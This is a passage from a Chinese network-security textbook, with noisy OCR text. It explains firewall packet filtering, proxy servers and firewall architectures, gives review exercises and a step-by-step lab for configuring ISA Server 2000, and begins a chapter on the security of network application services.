的 非 UNIX IP 产品 等 (NetWare/IP) 就 是 这 样 的。 那么 允许 达到 1023 端口 标准 的 数据 包 都 进 
入 网 络 的 话 ， 网 络 还 能 说 是 安全 的 吗 ? 连 这 些 客 户 程序 都 不 敢 说 自己 是 足够 安全 的 。 

我 们 给 防火 墙 这 样 下 命令 : 已 知 服务 的 数据 包 可 以 进来 , 其 他 的 全 部 挡 在 防火 墙 之 外 。 
比如 ， 如 果 你 知道 用 户 要 访问 Web 服务 器 ， 那 就 只 让 具有 源 端 口号 80 的 数据 包 进入 网 络 。 
可 采用 双向 过 滤 的 办 法 ， 原 理 如 图 7-12 所 示 。 
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7-12 双向 过 滤 原理 图 


不 过 新 问题 又 出 现 了 。 首 先 ， 你 怎么 知道 你 要 访问 的 服务 器 具有 哪些 正在 运行 的 端口 
号 呢 ? 像 HTTP 这 样 的 服务 器 本 来 就 是 可 以 任意 配置 的 ， 所 采用 的 端口 也 可 以 随意 配置 。 
如 果 你 这 样 设置 防火 墙 ， 你 就 没 法 访问 那些 未 采用 标准 端口 号 的 网 络 站 点 了 。 反 过 来 ， 你 
也 没 法 保证 进入 网 络 的 数据 包 中 具有 端口 号 80 的 就 一 定 来 自 Web 服务 器 。 有 些 黑 客 就 是 
利用 这 一 点 制作 自己 的 入 侵 工 具 ， 并 让 其 运行 在 本 机 的 80 端口 ! 

源 地 址 我 们 不 相信 ， 源 端口 也 信 不 得 了 ， 这 个 不 得 不 与 黑客 共 舞 的 疯狂 世界 上 还 有 什 
么 值得 我 们 信任 的 呢 ? 还 好 ， 事 情 还 没 到 走投无路 的 地 步 。 对 策 还 是 有 的 ， 不 过 这 个 
办 法 只 能 用 于 TCP 协议 ， 可 以 通过 检查 ACK 位 来 实现 ， 如 图 7-13 所 示 。 

TCP 是 一 种 可 靠 的 通信 协议 ，“ 可 靠 ”这 个 词 意味 着 协议 具有 包括 纠 错 机 制 在 内 的 一 
些 特 殊 性 质 。 为 了 实现 其 可 靠 性 ， 每 个 TCP 连接 都 要 先 经 过 一 个 “握手 ”过 程 来 交换 连接 
参数 。 还 有 ， 每 个 发 送出 去 的 包 在 后 续 的 其 他 包 被 发 送出 去 之 前 必须 获得 一 个 确认 响应 。 
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但 并 不 是 对 每 个 TCP 包 都 非 要 采用 专门 的 ACK 包 来 响应 ， 实 际 上 仅仅 在 TCP 包头 上 设置 
一 个 专门 的 位 就 可 以 完成 这 个 功能 了 。 所 以 ， 只 要 产生 了 响应 包 就 要 设置 ACK 位 。 连 接 会 
话 的 第 一 个 包 不 用 于 确认 ， 所 以 它 就 没有 设置 ACK 位 ， 后 续 会 话 交换 的 TCP 包 就 要 设置 
ACK 位 了 。 
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7-13 检查 ACK 位 


举 个 例子 ，PC 向 远 端 的 Web 服务 器 发 起 一 个 连接 , 它 生 成 一 个 没有 设置 ACK 位 的 连 
接 请 求 包 。 当 服务 器 响应 该 请 求 时 ， 服务 器 就 发 回 一 个 设置 了 ACK 位 的 数据 包 ， 同时 在 包 
里 标记 从 客户 机 所 收 到 的 字 节 数 。 然 后 客户 机 就 用 自己 的 响应 包 再 去 响应 该 数据 包 ， 这 个 
数据 包 也 设置 了 ACK 位 并 标记 了 从 服务 器 收 到 的 字 节 数 。 通 过 监视 ACK 位 ， 我 们 就 可 以 
将 进入 网 络 的 数据 限制 在 响应 包 的 范围 之 内 。 于 是 ， 远 程 系统 根本 无 法 发 起 TCP 连接 ， 但 
却 能 响应 收 到 的 数据 包 了 。 

这 套 机 制 还 不 能 算是 无 懈 可 击 ， 简 单 地 举 个 例子 ， 假 设 我 们 有 一 台 内 部 Web 服务 器 ， 
那么 端口 80 就 不 得 不 被 打开 以 便 外 部 请 求 可 以 进入 网 络 。 还 有 ， 对 UDP 包 而 言 就 没 法 监 
视 ACK 位 了 ， 因 为 UDP 包 就 没有 ACK 位 。 还 有 一 些 TCP 应 用 程序 ， 比 如 FTP， 连 接 就 
必须 由 这 些 服 务 器 程序 自己 发 起 。 

1. FTP 带 来 的 困难 


一 般 的 Intemet 服务 对 所 有 的 通信 都 只 使 用 一 对 端口 号 , FTP 程序 在 连接 期 间 则 使 用 两 
对 端口 号 : 第 一 对 端口 号 用 于 FTP 的 “命令 通道 ”提供 登录 和 执行 命令 的 通信 和 链 路 ， 而 另 
一 对 端口 号 则 用 于 FTP 的 “数据 通道 "提供 客户 机 和 服务 器 之 间 的 文件 传送 。 

通常 的 FTP 会 话 过 程 中 , 客户 机 首先 向 服务 器 的 端口 21( 命 令 通道 ) 发 送 一 个 TCP 连接 
请 求 ， 然 后 执行 LOGIN、DIR 等 各 种 命令 。 一 旦 用 户 请 求 服务 器 发 送 数 据 ，FTP 服务 器 就 
用 其 20 端口 数据 通道 ) 向 客户 的 数据 端口 发 起 连接 。 问 题 来 了 ， 如 果 服 务 器 向 客户 机 发 起 
传送 数据 的 连接 , 那么 它 就 会 发 送 没 有 设置 ACK 位 的 数据 包 , 防火 墙 则 按照 刚才 的 规则 拒 
绝 该 数据 包 ， 同 时 也 就 意味 着 数据 传送 是 不 可 能 的 。 通 常 只 有 高 级 的 防火 墙 才能 看 出 客户 
机 刚才 告诉 服务 器 的 端口 ， 然 后 才 许 可 对 该 端口 的 入 站 连接 。 

2. UDP 端口 过 滤 

我 们 再 看 看 怎么 解决 UDP 问题 。UDP 包 没 有 ACK 位 ， 所 以 不 能 进行 ACK 位 过 滤 ， 
UDP 是 发 出 去 不 管 的 “不 可 靠 ” 通信， 这 种 类 型 的 服务 通常 用 于 广播 、 路 由 、 多 媒体 等 广 
播 形式 的 通信 任务 。 NFS、DNS、WINS、NetBIOS-over-TCP/IP 和 NetWare/IP 都 使 用 UDP。 


由 务 /前 亡 多 寻 


看 来 最 简单 的 可 行 办 法 就 是 不 允许 建立 入 站 UDP 连接 。 防火 墙 设置 为 只 许 转 发 来 自 内 
部 接口 的 UDP 包 ， 来自 外 部 接口 的 UDP 包 则 不 转发 。 现 在 的 问题 是 ， 比 方 说 ，DNS 名 称 
解析 请 求 就 使 用 UDP， 如 果 你 提供 DNS 服务 ， 至 少 允 许 一 些 内 部 请 求 穿越 防火 墙 。 还 有 
IRC 这 样 的 客户 程序 也 使 用 UDP， 如 果 要 让 你 的 用 户 使 用 它 ， 就 同样 要 让 他 们 的 UDP 包 
进入 网 络 。 我 们 能 做 的 就 是 对 那些 从 本 地 到 可 信任 站 点 之 间 的 连接 进行 限制 。 但 是 ， 什 么 
叫 可 信任 ! 如 果 黑 客 采 取 地 址 欺骗 的 方法 不 就 又 回 到 老路 上 去 了 吗 ? 

有 些 新 型 路 由 器 可 以 通过 “记忆 ”出 站 UDP 包 来 解决 这 个 问题 ， 如 果 入 站 UDP 包 匹 
配 最 近 出 站 UDP 包 的 目标 地 址 和 端口 号 就 让 它 进来 如果 在 内 存 中 找 不 到 匹配 的 UDP 包 
就 只 好 拒绝 它 了 ! 但 是 ， 我 们 如 何 确信 产生 数据 包 的 外 部 主机 就 是 内 部 客户 机 希望 通信 的 
服务 器 呢 ? 如 果 黑 客 诈 称 DNS 服务 器 的 地 址 ， 那 么 在 理论 上 当然 可 以 从 附着 DNS 的 UDP 
端口 发 起 攻击 。 只 要 你 允许 DNS 查询 和 反馈 包 进 入 网 络 ， 这 个 问题 就 必然 存在 。 解 决 的 办 
法 是 采用 代理 服务 器 。 

所 谓 代理 服务 器 ， 顾 名 思 义 就 是 代表 你 的 网 络 和 外 界 打交道 的 服务 器 。 代 理 服务 器 不 
允许 存在 任何 网 络 内 外 的 直接 连接 。 它 本 身 就 提供 公共 和 专用 的 DNS、 邮件 服务 器 等 多 种 
功能 。 代 理 服 务 器 重 写 数据 包 而 不 是 简单 地 将 其 转发 了 事 。 给 人 的 感觉 就 是 网 络 内 部 的 主 
机 都 站 在 了 网 络 的 边缘 ,但 实际 上 它们 都 躲 在 代理 的 后 面 ， 露 面 的 不 过 是 代理 这 个 假 面具 。 


7.4.2 ”防火 墙 的 配置 规则 


防火 墙 配置 有 三 种 方式 : Dual-homed 方式 .Screened- host 方式 和 Screened-subnet 方式 。 

1) ”Dual-homed 方式 

此 种 方式 最 简单 ，Dual-homedGateway 放置 在 两 个 网 络 之 间 ， 这 个 Dual-omedGateway 
又 称 为 bastionhost。 这 种 结构 成 本 低 ， 但 是 它 有 单 点 失败 的 问题 。 这 种 结构 没有 增加 网 络 
安全 的 自我 防卫 能 力 ， 而 它 往往 是 受 “ 黑 客 ” 攻 击 的 首选 目标 ， 它 自己 一 旦 被 攻破 ， 整 个 

2) ” Screened-host 方式 

在 此 种 方式 中 的 Screeningrouter 为 保护 Bastionhost 的 安全 建立 了 一 道 屏障 。 它 将 所 有 
进入 的 信息 先 送 往 Bastionhost， 并 且 只 接受 来 自 Bastionhost 的 数据 作为 出 去 的 数据 。 这 种 
结构 依赖 于 Screeningrouter 和 Bastionhost， 只 要 有 一 个 失败 ， 整 个 网 络 就 暴露 了 。 

3) ”Screened-subnet 方式 

此 种 方式 包含 两 个 Screeningrouter 和 两 个 Bastionhost。 在 公共 网 络 和 私有 网 络 之 间 构 
成 了 一 个 隔离 网 ， 称 为 “停火 区 ”(DMZ)，Bastionhost 放置 在 “停火 区 ”内 。 这 种 结构 安 
全 性 好 ， 只 有 当 两 个 安全 单元 被 破坏 后 ， 网 络 才 被 暴露 ， 但 是 成 本 也 很 昂贵 。 


7.4.3 1ISA Server 的 应 用 


ISA Server 是 建立 在 Windows Server 2003 操作 系统 上 的 一 种 可 扩展 的 企业 级 防火 墙 和 
Web 缓存 服务 器 。ISA Server 的 多 层 防火 墙 可 以 保护 网 络 资源 免 受 病毒 、 黑 客 的 入 侵 和 未 
经 授权 的 访问 。 而 且 ， 通 过 本 地 而 不 是 Intemet 为 对 象 提 供 服 务 ， 其 Web 缓存 服务 器 允许 
组 织 能 够 为 用 户 提供 更 快 的 Web 访问 。 在 网 络 内 安装 SA Server 时 ， 可 以 将 其 配置 成 防火 
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墙 ， 也 可 以 配置 成 Web 缓存 服务 器 ， 或 二 者 兼备 。 

ISA Server 提供 直观 而 强大 的 管理 工具 , 包括 Microsoft 管理 控制 台 管理 单元 、 图 形 化 
任务 板 和 逐步 进行 的 向 导 。 利 用 这 些 工 具 ，ISA Server 能 将 执行 和 管理 一 个 坚固 的 防火 墙 
和 缓存 服务 器 所 遇 到 的 困难 减 至 最 小 。 

ISA Server 提供 一 个 企业 级 Interet 连接 解决 方案 ， 它 不 仅 包括 特性 丰富 且 功 能 强大 的 
防火 墙 , 还 包括 用 于 加 速 Intemet 连接 的 可 伸缩 的 Web 缓存 。 根据 组 织 网 络 的 设计 和 需要 ， 
ISA Server 的 防火 墙 和 Web 缓存 组 件 可 以 分 开 配 置 ， 也 可 以 一 起 安装 。 

ISA Server 有 两 个 版 本 ， 以 满足 用 户 对 业务 和 网 络 的 不 同 需求 。ISA Server 标准 版 可 以 
为 小 型 企业 、 工 作 组 和 部 门 环境 提供 企业 级 防火 墙 安全 和 Web 缓存 能 力 。ISA Server 企业 
版 是 为 大 型 组 织 设计 的 ， 支 持 多 服务 器 阵列 和 多 层 策略 ， 提 供 更 易 伸 缩 的 防火 墙 和 Web 组 
存 服务 器 。 

利用 Windows Server 2003 安全 数据 库 ，ISA Server 允许 用 户 根据 特定 的 通信 类 型 ， 为 
Windows Server 2003 内 定义 的 用 户 、 计 算 机 和 组 设置 安全 规则 ， 具 有 先进 的 安全 特性 。 

利用 ISA Management 控制 台 ，ISA Server 使 防火 墙 和 缓存 管理 变 得 很 容易 。ISA 
Management 采用 MMC， 并 且 广 泛 使 用 任务 板 和 向 导 ， 大 大 简化 了 最 常见 的 管理 程序 ， 从 
而 集中 统一 了 服务 器 的 管理 。ISA Server 也 提供 强大 的 基于 策略 的 安全 管理 ， 这 样 ， 管 理 
员 就 能 将 访问 和 带宽 控制 应 用 于 所 设置 的 任何 策略 单元 ， 如 用 户 、 计 算 机 、 协 议 、 内 容 类 
型 、 时 间 表 和 站 点 。 总 之 ，ISA Server 是 一 个 拥有 自己 的 软件 开发 工具 包 和 脚本 示例 的 高 
扩展 性 平台 ， 利 用 它 可 以 根据 自身 业务 需要 量 身 定制 mtemet 安全 解决 方案 。 

ISA Server 的 作用 如 下 : 

不 管 是 什么 规模 的 组 织 ， 只 要 它 关 心 自己 网 络 的 安全 、 性 能 、 管 理 和 运营 成 本 ， 对 其 
IT 管理 者 、 网 络 管理 员 和 信息 安全 专业 人 员 来 说 ，ISA Server 都 具备 使 用 价值 。ISA Server 
有 3 种 不 同 的 安装 模式 ， 防火 墙 (Firewall) 模 式 、 缓 存 (Cache) 模 式 和 集成 (Integrated) 模 式 。 
集成 模式 能 够 在 同一 台 计 算 机 上 实现 前 两 种 模式 。 组 织 可 以 有 多 种 联网 方案 来 部 署 ISA 
Server， 包 括 以 下 所 述 的 几 种 方法 。 

(1) Intemet 防火 墙 。 

(2) 安全 服务 器 发 布 。 

(3) 正 向 Web 缓存 服务 器 。 

(4) 反 向 Web 缓存 服务 器 。 

(5) 防火 墙 和 Web 缓存 集成 服务 器 。 


小 ” 结 


本 章 主 要 介绍 了 防火 墙 的 基本 概念 、 功 能 和 规则 ， 以 及 防火 墙 的 分 类 和 体系 结构 ， 重 
点 讲述 了 防火 墙 的 应 用 方法 ， 学 习 完 本 章 后 可 以 掌握 有 关 防 火 墙 的 相关 知识 ， 系 统 地 了 解 
防火 墙 的 应 用 方法 。 
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本 章 习 题 
一 、 判 断 题 
1. 网 络 防火 墙 主要 用 于 防止 网 络 中 的 计算 机 病毒 。 ( ) 
2. 防火 墙 主要 用 来 防范 内 部 网 络 的 攻击 。 ( 汪 
3. 安装 了 防 病 毒 软件 后 ， 还 必须 经 常 对 防 病 毒 软件 升级 。 ( ) 
4. 防火 墙 构架 于 内 部 网 与 外 部 网 之 间 ， 是 一 套 独 立 的 硬件 系统 。 
5. 第 四 代 防 火 墙 即 应 用 层 防火 墙 是 目前 最 先进 的 防火 墙 。 EE， 
6. 芯片 级 防火 墙 基于 专门 的 硬件 平台 ， 没 有 操作 系统 。 Cr 3 
7. 防火 墙 能 够 有 效 地 解决 来 自 内 部 网 络 的 攻击 和 安全 问题 。 € ' 
8. 复合 型 防火 墙 是 内 部 网 与 外 部 网 的 隔离 点 ,起 着 监视 和 隔绝 应 用 层 通信 流 的 作用 ， 
同时 也 常 结合 过 滤器 的 功能 。 KE 
9. 非法 访问 一 旦 突破 数据 包 过 滤 型 防火 墙 ， 即 可 对 主机 上 的 软件 和 配置 漏洞 进行 
攻击 。 C 
二 、 简 答题 


1. 防火 墙 的 主要 性 能 指标 有 哪些 ? 

2. 请 根据 如 图 7-14 所 示 的 防火 墙 体系 结构 的 示意 图 ， 回 答 下 述 问 题 。 
(1) 图 中 所 表示 的 防火 墙 体系 结构 属于 哪 种 常见 防火 墙 体系 结构 类 型 ? 
(2) 图 中 的 堡垒 主机 主要 完成 的 工作 是 什么 ? 


图 7-14 防火墙 体系 结构 


实 训 7 ISA 的 构建 与 配置 


ISA 防火 墙 需要 一 台 装 有 两 个 网 络 适 配器 的 计算 机 。 需 要 将 其 中 的 一 个 适配器 连接 到 
内 部 网 络 。 将 另外 一 个 适配器 连接 到 你 的 Intemet 服务 供应 商 (ISP)。ISP 能 帮助 你 建立 
该 连接 。 防 火 墙 通过 阻止 Intermet 上 的 其 他 人 访问 内 部 网 络 或 你 的 计算 机 上 的 机 密 信息 ， 
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来 充当 企业 Intranet 与 Intemet 之 间 的 安全 屏障 。 

ISA 可 以 安装 在 独立 的 计算 机 上 、Windows NT 域 成 员 计算 机 上 或 Windows 2000 
Active Directory 域 成 员 的 计算 机 上 。 为 实现 最 高 的 安全 性 ， 应 在 一 台独 立 计算 机 上 运行 
ISA Server。 


1. 实验 目的 

(1) 掌握 配置 网 络 连接 。 

(2) 掌握 如 何 安装 ISA Server 2000 Standard Edition 。 

(3) 完成 配置 ISA Server， 以 允许 客户 访问 Intemet。 

2. 实验 内 容 

(1) 配置 服务 器 的 网 络 适配器 。 

(2) 安装 ISA Server 2000 Standard Edition。 

(3) 配置 ISA Server 以 允许 客户 访问 Intemet。 

3. 实验 步骤 

1) ”配置 服务 器 的 网 络 适配器 

右键 单 击 桌面 上 的 网 上 邻居 ， 然 后 单 击 属性 。 

右键 单 击 Intemet 连接 ， 单 击 重 命名 ， 然 后 输入 Intemet 连接 。 这 将 帮助 你 记 住 哪 块 
网 卡 连接 到 了 Intemet。 

右键 单 击 Internet 连接 ， 然 后 单 击 属性 。 

在 常规 选项 卡 上 ， 单 击 以 选中 连接 后 在 任务 栏 中 显示 图 标 复 选 框 。 在 该 接口 传输 数据 
时 ， 任 务 栏 上 的 小 图 标 将 闪烁 。 

清除 Microsoft 网 络 客户 机 和 Microsoft 网 络 的 文件 和 打印 机 共享 复 选 框 。ISA Server 
通过 清除 这 些 复 选 框 自动 阻挡 这 些 协议 ， 从 而 使 你 可 以 节省 内 存 。 

双击 Internet 协议 (TCPHIP)， 然 后 执行 以 下 步骤 之 一 : 

如 果 你 的 ISP 使 用 DHCP 分 配 IP 地 址 ， 则 在 Intemet 协议 (TCP/IP) 属性 对 话 框 
中 ， 单 击 以 选中 自动 获得 IP 地 址 和 自动 获得 DNS 服务 器 地 址 复 选 框 。 

如 果 需 要 手动 输入 ISP 的 IP 地 址 信息 , 则 在 Intemet 协议 (TCP/IP) 属性 对 话 框 中 ， 
单 击 以 选中 使 用 下 面 的 人 P 地 址 ， 然 后 输入 你 的 ISP 提供 的 地 址 、 子 网 掩 码 和 默认 网 关 信 
息 。 单 击 以 选中 使 用 下 面 的 DNS 服务 器 地 址 , 然后 输入 你 的 ISP 提供 的 一 个 或 多 个 DNS 
服务 器 的 名 称 。 

单 击 高 级 , 然后 单 击 DNS 选项 卡 。 单 击 以 清除 在 DNS 中 注册 此 连接 的 地 址 复 选 框 。 


注意 : 你 需要 为 内 部 适配器 上 的 内 部 网 络 输 入 永久 的 地 址 和 相应 的 子 网 掩 码 (不 要 在 该 接口 
上 使 用 DHCP)。 将 默认 网 关 留 为 空白 。ISA Server 计算 机 只 需要 一 个 默认 网 关 : 在 
外 部 接口 上 配置 它 。 在 内 部 适配器 上 配置 默认 网 关 会 引起 ISA 故障 。 


2) ”配置 连接 到 网 络 的 内 部 接口 


右键 单 击 网 上 邻居 ， 然 后 单 击 属性 。 右 键 单 击 本 地 连接 (LAN)， 单 击 重 命名 ， 然 后 输 
入 局 域 网 。 
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右键 单 击 局 域 网 ， 然 后 单 击 属性 。 

在 常规 选项 卡 上 ， 单 击 以 选中 连接 后 在 任务 栏 中 显示 图 标 复 选 框 。 

如 果 未 选中 ， 单 击 以 选中 Microsoft 网 络 客户 机 和 Microsoft 网 络 的 文件 和 打印 机 共 
享 复 选 框 。 

双击 Intemet 协议 (TCP/IP)， 然 后 单 击 以 选中 使 用 下 面 的 人 P 地 址 复 选 框 。 

在 IP 地 址 中 ， 输 入 符合 内 部 网 络 地 址 编排 方案 的 内 部 IP 地 址 和 子 网 掩 码 。 将 默认 
网 关 留 为 空白 。 在 首选 DNS 服务 器 中 ,输入 网 络 的 一 台 或 多 台 DNS 服务 器 的 IP 地 址 。 

备注 : 对 于 少 于 255 台 计 算 机 的 小 型 网 络 , 如 果 使 用 Windows 2000 默认 TCP/IP 配 
置 ， 并 且 网 络 中 没有 DNS 服务 器 ， 则 计算 机 依赖 于 自动 专用 IP 地 址 分 配 (APIPA)。 应 
该 从 APIPA 迁移 出 来 ， 并 开始 在 客户 机 工作 站 上 使 用 静态 地 址 。 网 络 中 的 每 台 计 算 机 需 
要 一 个 唯一 的 IP 地 址 。 如 果 配 置 了 ISA Server 的 内 部 接口 ， 需 要 输入 静态 地 址 ， 所 以 使 
用 地 址 192.168.0.254 及 子 网 掩 码 255.255.255.0。 将 默认 网 关 框 留 为 空白 。 在 DNS 服务 器 
字段 中 输入 ISP 的 DNS 服务 器 。 

现在 ， 在 每 台 客户 机 上 配置 静态 地 址 : 

在 第 一 台 计 算 机 上 ， 使 用 地 址 192.168.0.1， 子 网 掩 码 为 255.255.255.0， 默 认 网 关 为 
192.168.0.254。 对 于 DNS， 输 入 ISP 的 一 台 ( 或 多 台 ) DNS 服务 器 。 

在 第 二 台 计 算 机 上 ， 使 用 地 址 192.168.0.2， 然 后 使 用 与 上 一 步骤 中 使 用 的 相同 的 值 。 
除 地 址 外 ， 其 他 值 都 相同 ， 只 是 为 每 台 额 外 的 计算 机 递增 地 址 值 。 维 护 一 个 指示 哪些 计算 
机 使 用 哪些 地 址 的 列表 。 

得 到 提示 时 ， 重 新 启动 计算 机 。 

3) ”安装 ISA Server 2000 Standard Edition 

如 果 你 没有 安装 Windows 2000 Service Pack 1 (SP1) 和 从 Microsoft ISA Server 2000 
Standard Edition 光盘 获得 的 修补 程序 ， 应 立即 安装 。 

ISA 安装 程序 提出 一 系列 问题 。 

使 用 ISA Server Setup Wizard(ISA Server 安装 向 导 )， 在 “Welcome( 欢 迎 )” 屏 幕 上 ， 
单 击 Continue( 继 续 )。 在 相应 的 框 中 输入 产品 的 标识 号 。 你 可 以 在 光盘 盒 的 背面 找到 该 
号 码 。 

请 阅读 许可 协议 ， 单 击 IAgree( 同 意 )。 

单 击 Typical installation( 典 型 安装 ) 作 为 安装 类 型 。 这 将 安装 ISA 服务 和 管理 工具 。 然 
后 选择 安装 模式 : 防火 墙 、 代 理 服务 器 、 集 成 模式 。ISA 停止 计算 机 上 的 相关 服务 。 

为 ISA 配置 本 地 地 址 表 (LAT)。 配 置 LAT 时 需要 仔细 考虑 。 为 你 提供 两 种 选择 : 
构建 LAT 或 者 使 用 安装 程序 向 导 。 根 据 以 下 条 件 做 出 选择 : 

如 果 知 道内 部 网 络 使 用 的 子 网 , 请 在 这 里 输入 ,不 要 单 击 Construct Table( 建 立 表 ) 按 钮 ! 
如 果 单 击 ， 所 输入 的 LAT 信息 将 会 被 覆盖 。 如 果 不 知道 本 地 子 网 ， 请 单 击 Construct 
Table( 建 立 表 ) 按 钮 。“ISA Setup Wizard(ISA 安装 向 导 )” 将 根据 计算 机 的 路 由 表 确 定 本 地 
子 网 。 

如 果 未 选中 ， 请 单 击 以 选中 Add the following private ranges( 添 加 以 下 专用 范围 ) 复 

如 果 未 选中 ， 请 单 击 以 选中 Add address ranges based on the Windows 2000 routing 
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table( 基 于 Windows 2000 路 由 表 增 加 地 址 范围 )。 

单 击 以 清除 包含 与 服务 器 的 外 部 (Intemet) 接口 相对 应 的 子 网 的 复 选 框 。 
单 击 以 选中 包含 与 服务 器 的 内 部 (LAN) 接口 相对 应 的 子 网 的 复 选 框 。 

当 安 装 程序 完成 时 ， 启 动 “Administrator Getting Started( 管 理 员 入 门 向 导 )”， 然 后 在 完 
成 该 向 导 之 前 阅读 下 一 节 。 

4) ”配置 ISA Server 以 允许 客户 访问 Intemet 

ISA Server 安装 后 的 状态 将 阻挡 对 Intermet 的 来 往 访问 。 防 火 墙 的 主要 功能 是 在 两 个 
网 络 之 间 充 当 检 查 点 。ISA Server 的 行为 是 通过 策略 阻挡 任何 没有 被 明确 允许 的 内 容 。 

(1) 配置 ISA 安装 后 的 状态 。 

必须 对 访问 策略 的 以 下 两 个 组 件 进行 配置 ， 以 便 客户 机 能 够 访问 Intemet。 

必须 至 少 配 置 一 个 站 点 和 内 容 规则 ， 在 其 中 指定 用 户 可 访问 哪些 站 点 以 及 可 检索 哪些 
类 型 的 内 容 。 

必须 至 少 配 置 一 个 协议 规则 ， 以 便 指定 哪些 类 型 的 通信 允许 通过 ISA Server。 

安装 完成 后 ，ISA 创建 一 个 默认 站 点 和 内 容 规则 ， 人 允许 所 有 客户 机 在 所 有 时 间 访 问 所 
有 站 点 上 的 所 有 内 容 。 但 是 这 对 于 要 开始 在 Intemet 上 冲浪 的 用 户 来 说 是 不 够 的 ， 现 在 还 
没有 已 定义 的 协议 规则 。 没 有 它 ， 将 不 允许 通过 ISA 的 通信 。 

(2) 入 门 向 导 。 

在 “Getting Started Wizard( 入 门 向 导 )” 中 ， 单 击 Configure Protocol Rules( 配 置 协议 规 
则 )。 协 议 规则 列表 显示 在 Microsoft 管理 控制 台 (MMC) 中 。 

单 击 Create a Protocol Rule( 创 建 协议 规则 )。 输 入 名 称 ， 如 “所 有 协议 ”。 

为 规则 的 操作 单 击 Allow( 人 允许)( 这 是 默认 值 )。 

单 击 All IP traffic( 所 有 卫 通信 ) 作 为 协议 列表 (这 是 默认 值 )。 

单 击 Always( 始 终 ) 作 为 计划 (这 是 默认 值 )。 

单 击 Any request( 任 何 请 求 ) 作 为 客户 机 类 型 (这 是 默认 值 )。 

单 击 Finish( 完 成 )。 

(3) 创建 用 户 如 何 连接 到 Intemet 的 策略 。 

ISA Server 的 作用 远 不 止 允许 所 有 的 客户 机 使 用 所 有 (已 定义 的 ) 协 议 , 在 所 有 时 间 访 问 
所 有 站 点 上 的 所 有 内 容 。 在 ISA 中 ， 可 以 创建 用 于 准确 定义 用 户 如 何 访问 Intemet 的 访 
问 策略 。 

ISA 访问 策略 由 以 下 三 个 元 素 组 成 : 

@ 站 点 和 内 容 规则 。 

@ 协议 规则 。 

@ 了 PP 数 据 包 筛选 器 。 

而 这 些 规则 又 由 以 下 策略 元 素 组 成 : 
计划 。 
目标 集合 。 
客户 机 地 址 集合 。 
协议 的 定义 。 
内 容 组 。 
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在 试图 使 用 ISA 策略 定义 复杂 内 容 之 前 ， 应 了 解 一 些 依存 关系 。 下 面 描述 哪些 策略 元 
素 属 于 哪些 策略 规则 : 

@ 站 点 和 内 容 规则 一 一 协议 规则 。 

@ 目标 集合 一 一 协议 的 定义 。 

@ 内容 组 一 一 计划 。 

@ 计划 一 一 客户 机 地 址 集合 。 

(4) 从 ISA 计算 机 访问 Intemet。 

从 ISA 计算 机 本 身 访问 Internet 会 怎样 ? 已 创建 的 协议 规则 、 站 点 和 内 容 规 则 仅 应 用 
于 ISA 服务 器 后 面 的 客户 机 ， 当 客户 机 希望 访问 Interet 时 ， 只 要 规则 允许 该 请 求 , ISA 就 
为 该 连接 请 求 创 建 一 个 动态 数据 包 筛 选 器 。 但 是 ， 如 果 想 在 ISA 计算 机 上 访问 Intemet， 则 
必须 按照 将 产生 的 通信 的 种 类 创建 静态 数据 包 筛 选 器 。 例 如 ， 若 要 访问 一 个 Web 站 点 ， 请 
按照 下 列 步 骤 操 作 : 

在 “ISA Management(ISA 管理 )” 中 ， 展 开 Servers( 服 务 器 )， 展 开 服务 器 名 称 ， 单 击 
Access Policy( 访 问 策略 )， 然 后 单 击 IP Packet Filters(IP 数据 包 筛 选 器 )。 

单 击 Create a packet filter( 创 建 数据 包 筛 选 器 ) 以 启动 向 导 。 

(5) Web 访问 。 

单 击 Allow packet transmission( 允 许 数 据 包 传输 )， 然 后 单 击 Custom( 自 定义 )。 

单 击 TCP 作为 PP 协议 ， 单 击 Outbound( 出 站 ) 作 为 方向 ， 为 本 地 端口 单 击 All ports( 所 
有 端口 )， 然 后 为 远程 端口 单 击 Fixed port( 固 定 端口 )。 在 Port Number( 端 口号 ) 对 话 框 中 输 
入 80。 

为 ISA 服务 器 上 的 每 个 外 部 接口 选择 默认 人 P 地 址 。 

单 击 All remote computers( 所 有 远程 计算 机 )。 

备注 : ISA Server 不 在 LAT 中 的 任何 地 址 和 外 界 之 间 建 立 直接 连接 。 必 须 创 建 某 种 能 
够 描述 要 允许 的 访问 的 策略 。 
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【本 章 要 点 】 

通过 本 章 的 学 习 ， 应 该 了 解 常用 的 网 络 应 用 服务 的 种 类 ， 掌 握 IIS 信息 服务 中 的 WEB 
服务 器 的 安全 架设 、FTP 服务 器 的 安全 架设 、 文 件 服务 器 的 安全 架设 以 及 域 控制 器 的 安全 
架设 问题 。 并 能 通过 上 机 实 训 与 课 后 练习 题 的 结合 使 用 ,达到 对 网 络 应 用 服务 的 安全 配置 。 


8.1 网 络 应 用 服务 概述 


网 络 应 用 是 利用 网 络 以 及 信息 系统 直接 为 用 户 提供 服务 以 及 业务 的 平台 。 网 络 应 用 服 
务 直接 与 成 千 上 万 的 用 户 打 交道 ， 用 户 通过 网 络 应 用 服务 浏览 网 站 、 网 上 购物 、 下 载 文 件 、 
看 电视 、 发 短信 等 ， 网 络 应 用 服务 的 安全 直接 关系 到 广大 网 络 用 户 的 利益 。 因 此 网 络 应 用 
服务 的 安全 是 网 络 与 信息 安全 中 的 重要 组 成 部 分 。 
网 络 应 用 服务 ， 是 在 网 络 上 利用 软 /硬件 平台 满足 特定 信息 传递 和 处 理 需 求 的 行为 。 指 
的 是 在 网 络 上 所 开放 的 一 些 服务 , 通常 能 见 到 的 如 Web、MAIL、FTP、DNS、TELNET 等 。 
当然 ， 也 有 一 些 非 通用 的 ， 如 在 某 些 领域 、 行 业 中 自主 开发 的 网 络 应 用 服务 。 我 们 通常 所 
说 的 服务 器 ， 即 是 具有 网 络 服务 的 主机 。 
网 络 应 用 服务 安全 ， 指 的 是 主机 上 运行 的 网 络 应 用 服务 是 否 能 够 稳定 、 持 续 运行 ， 不 
会 受到 非法 的 数据 破坏 及 运行 影响 。 


8.1.1 网 络 应 用 服务 安全 问题 的 特点 


每 一 个 网 络 应 用 服务 都 是 由 一 个 或 多 个 程序 构成 ， 在 讨论 安全 性 问题 时 ， 不 仅 要 考虑 
到 服务 端 程序 ， 也 需要 考虑 到 客户 端 程序 。 服 务 端的 安全 问题 主要 表现 在 非法 的 远程 访问 ， 
客户 端的 安全 问题 主要 表现 在 本 地 越权 使 用 客户 程序 。 由 于 大 多 数 服务 的 进程 由 超级 用 户 
守护 ， 许 多 重大 的 安全 漏洞 往往 出 现在 一 些 以 超级 用 户 守护 的 应 用 服务 程序 上 。 


8.1.2 网络 应 用 服务 的 分 类 


